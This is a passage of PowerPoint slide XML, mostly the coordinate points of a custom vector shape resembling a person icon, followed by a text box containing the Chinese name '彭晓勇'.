                  <a:lnTo>
                    <a:pt x="495" y="4570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="4643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423" y="4717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388" y="4791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356" y="4868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324" y="4945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294" y="5024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265" y="5104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238" y="5185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="5266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="5349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163" y="5433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141" y="5518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121" y="5603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="5690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="5777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="5866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="5955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="6045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="6136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="6227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14" y="6319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="6413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="6506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="6600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="6796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="6897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5364" y="6897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5366" y="6796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5367" y="6695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5367" y="6600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5364" y="6506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5359" y="6413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5353" y="6319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5346" y="6227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5337" y="6136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5325" y="6045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5313" y="5955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5298" y="5866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5283" y="5777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5266" y="5690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5247" y="5603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5226" y="5518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5205" y="5433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5181" y="5349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5157" y="5266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5131" y="5185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5103" y="5104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5073" y="5024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5043" y="4945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5012" y="4868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4979" y="4791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4945" y="4717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4909" y="4643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4872" y="4570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4834" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4796" y="4429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4755" y="4361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4713" y="4293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4671" y="4227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4627" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4582" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4489" y="3978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4440" y="3920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4391" y="3863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4340" y="3807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4290" y="3753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4238" y="3702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="3651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4130" y="3603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4076" y="3556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4020" y="3511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="3468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3906" y="3426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="3386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3788" y="3349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3728" y="3313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3668" y="3279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3607" y="3247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3545" y="3217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3482" y="3189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3419" y="3163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355" y="3140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3290" y="3118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3225" y="3099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159" y="3081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3093" y="3066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3025" y="3054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2958" y="3043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2891" y="3035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822" y="3029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2753" y="3026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2684" y="3025"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2708" y="2647"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2708" y="2647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2743" y="2646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2778" y="2645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="2643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2847" y="2640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="2636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915" y="2631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2949" y="2626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982" y="2620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3014" y="2613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3047" y="2605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3079" y="2596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112" y="2587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="2577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175" y="2566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3205" y="2555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3236" y="2542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3266" y="2530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="2517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3326" y="2502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355" y="2487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3383" y="2472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3411" y="2455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3439" y="2438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3466" y="2421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3493" y="2403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3519" y="2384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3545" y="2365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571" y="2345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="2324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3619" y="2303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3643" y="2282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3667" y="2259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3689" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3711" y="2213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3733" y="2189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3754" y="2165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3774" y="2140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="2115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3814" y="2089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="2063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3850" y="2036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3868" y="2010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3884" y="1983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3900" y="1954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3915" y="1925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930" y="1897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3944" y="1868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3957" y="1839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3970" y="1808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3981" y="1778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3993" y="1748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4003" y="1717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4012" y="1686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4021" y="1654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4029" y="1622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4036" y="1590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4042" y="1557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4048" y="1525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4052" y="1492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057" y="1459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4060" y="1425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4062" y="1391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="1357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="1324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="1289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4062" y="1255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4060" y="1221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057" y="1188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4052" y="1155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4048" y="1121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4042" y="1089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4036" y="1057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4029" y="1025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4021" y="993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4012" y="962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4003" y="930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3993" y="899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3981" y="868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3970" y="838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3957" y="809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3944" y="778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930" y="750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3915" y="721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3900" y="693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3884" y="665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3868" y="638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3850" y="610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3814" y="557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3774" y="506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3754" y="481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3733" y="458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3711" y="433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3689" y="411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3667" y="388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3643" y="366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3619" y="344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3545" y="282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3519" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3493" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3466" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3439" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3411" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3383" y="176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355" y="160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3326" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3266" y="117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3236" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3205" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3079" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3047" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3014" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2949" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2847" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2778" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2743" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2708" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2605" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2570" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2503" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2469" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2306" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2274" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2243" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2152" y="117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2121" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2092" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063" y="160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2035" y="176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1979" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1899" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1873" y="282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1847" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1822" y="323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1797" y="344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774" y="366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1751" y="388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728" y="411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1706" y="433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685" y="458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664" y="481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1643" y="506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1623" y="532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604" y="557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1586" y="584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568" y="610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1550" y="638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533" y="665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1503" y="721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1488" y="750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1474" y="778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461" y="809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436" y="868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1425" y="899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1415" y="930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1406" y="962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1397" y="993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1389" y="1025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1381" y="1057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376" y="1089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1370" y="1121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366" y="1155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361" y="1188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1358" y="1221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="1255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354" y="1289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354" y="1324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354" y="1357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="1391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1358" y="1425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361" y="1459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366" y="1492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1370" y="1525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376" y="1557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1381" y="1590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1389" y="1622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1397" y="1654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1406" y="1686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1415" y="1717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1425" y="1748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1436" y="1778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="1808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461" y="1839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1474" y="1868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1488" y="1897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1503" y="1925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="1954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533" y="1983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1550" y="2010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568" y="2036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1586" y="2063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604" y="2089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1623" y="2115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1643" y="2140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664" y="2165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685" y="2189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1706" y="2213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1751" y="2259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774" y="2282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1797" y="2303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1822" y="2324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1847" y="2345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1873" y="2365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1899" y="2384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925" y="2403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="2421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1979" y="2438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007" y="2455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2035" y="2472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063" y="2487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2092" y="2502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2121" y="2517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2152" y="2530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181" y="2542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212" y="2555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2243" y="2566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2274" y="2577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2306" y="2587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338" y="2596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370" y="2605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402" y="2613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436" y="2620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2469" y="2626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2503" y="2631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536" y="2636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2570" y="2640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2605" y="2643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639" y="2645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673" y="2646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2708" y="2647"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="tx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sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166711" y="2985135"/>
            <a:ext cx="811054" cy="371475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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sz="15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彭晓勇</a:t>
            </a:r>
